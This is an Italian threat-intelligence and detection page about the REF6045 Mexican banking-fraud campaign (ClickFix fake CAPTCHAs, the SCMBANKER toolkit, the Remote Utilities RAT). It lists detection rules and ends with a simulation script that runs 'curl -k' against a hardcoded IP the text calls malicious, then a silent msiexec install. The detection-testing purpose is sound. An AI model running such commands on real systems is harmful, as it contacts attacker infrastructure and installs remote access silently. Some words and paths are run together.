ClickFix per Incasso: Analisi di un Toolkit di Frodi Bancarie Messicano
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
REF6045 è una campagna di frode bancaria assistita da operatori che si concentra sul settore finanziario messicano. Utilizza un metodo di consegna in stile ClickFix con pagine CAPTCHA false per convincere le vittime a eseguire comandi PowerShell dannosi. Dopo l’infezione, il toolkit SCMBANKER consente agli operatori umani di osservare sessioni bancarie, acquisire screenshot, modificare i contenuti degli appunti e distribuire Remote Utilities RAT per il pieno controllo remoto.
Indagine
Elastic Security Labs ha scoperto la minaccia dopo aver rilevato attività sospette bitsadmin scaricando script PowerShell da una directory aperta. L’indagine ha esposto l’intero toolkit attraverso un archivio web-root accessibile pubblicamente, zkt.zip, e ha rivelato gravi debolezze di sicurezza operativa, inclusi editor di file non autenticati e directory aperte sull’infrastruttura di comando e controllo. L’analisi ha anche mostrato che il toolkit contiene numerosi artefatti generati da AI nella sua base di codice.
Mitigazione
Le organizzazioni dovrebbero limitare l’uso di PowerShell e bitsadmin agli utenti approvati e imporre controlli rigorosi di esecuzione. Gli utenti dovrebbero essere addestrati a identificare esche di ingegneria sociale come falsi prompt CAPTCHA o falsi schermi di aggiornamento di Windows. I team di sicurezza dovrebbero anche implementare un forte monitoraggio per modifiche sospette al registro e installazioni non autorizzate di software di accesso remoto.
Risposta
Se viene rilevata questa attività, isolare immediatamente i sistemi interessati per fermare la comunicazione di comando e controllo e il possibile furto di dati. Eseguire un’indagine forense per determinare l’entità del compromesso e verificare la presenza di Remote Utilities o modifiche non autorizzate al registro. Reimpostare le password per tutti i conti finanziari e altri account sensibili accessibili dai computer compromessi.
Flusso di Attacco
Rilevamenti
MsiExec Lanciato da Processo Shell (via cmdline)
Visualizza
Esecuzione di Attrib per Nascondere File (via cmdline)
Visualizza
File Sospetti nel Profilo Utente Pubblico (via file_event)
Visualizza
Possibilità di Esecuzione Attraverso Linee di Comando PowerShell Nascoste (via cmdline)
Visualizza
Arresto Utilizzato per Forzare un Arresto o Riavvio del Sistema (via cmdline)
Visualizza
LOLBAS Bitsadmin (via cmdline)
Visualizza
Possibile Comportamento di Esecuzione Ritardata (via cmdline)
Visualizza
Possibile Enumerazione/Manipolazione di Account o Gruppi (via cmdline)
Visualizza
Microsoft Edge Lanciando Processo Insolito (via cmdline)
Visualizza
Uso Sospetto di CURL (via cmdline)
Visualizza
Posizione Esecuzione Eseguibile/Script Sospetta tramite [cmd.exe /C] (via cmdline)
Visualizza
Rilevamento di SCMBANKER e Installazione di Remote Utilities [Creazione Processo Windows]
Visualizza
Rilevamento Attività Toolkit SCMBANKER [Windows Powershell]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-flight di Telemetria & Baseline deve essere superato.
Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa & Comandi di Attacco: L’avversario mira a stabilire un punto d’appoggio sul sistema bersaglio imitando il pattern di frode bancaria REF6045. Per prima cosa, tentano di scaricare un file di convalida da un indirizzo IP maligno hardcoded (
68.211.161.46) usandocurlcon il flag-k(insecure) per bypassare la validazione del certificato SSL. Dopo il download, l’avversario esegue un’installazione silenziosa di uno strumento di accesso remoto maligno utilizzandomsiexec.execon il flag/i(install) e/quiet(silenzioso) targeting un file denominatohosts.msi. Questo fornisce loro un accesso remoto persistente riducendo al minimo l’interazione dell’utente. -
Script Test Regressione:
# Script di Simulazione per TTP REF6045 # Questo script imita le specifiche linee di comando definite nella regola di rilevamento. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Passaggio 1: Simulazione del Trasferimento Strumenti Ingressi tramite curl..." -ForegroundColor Cyan # Nota: utilizzando un file falso tramite curl per evitare traffico effettivamente dannoso, # ma mantenendo la stringa esatta della linea di comando richiesta per il rilevamento. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Passaggio 2: Simulazione dell'Installazione MSI Silenziosa..." -ForegroundColor Cyan # Creare un file MSI fittizio in modo che msiexec non dia immediatamente errori (anche se il rilevamento si innesca sulla linea di comando) # Per il solo scopo di testare la LOGICA DI RILEVAMENTO (la linea di comando), # eseguiamo la stringa di comando esatta. msiexec /i "hosts.msi" /quiet /norestart -
Comandi di Pulizia:
# Script di pulizia per rimuovere gli artefatti $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Pulizia completata: $WorkDir rimosso." -ForegroundColor Green } else { Write-Host "[!] Pulizia saltata: Directory non trovata." -ForegroundColor Yellow }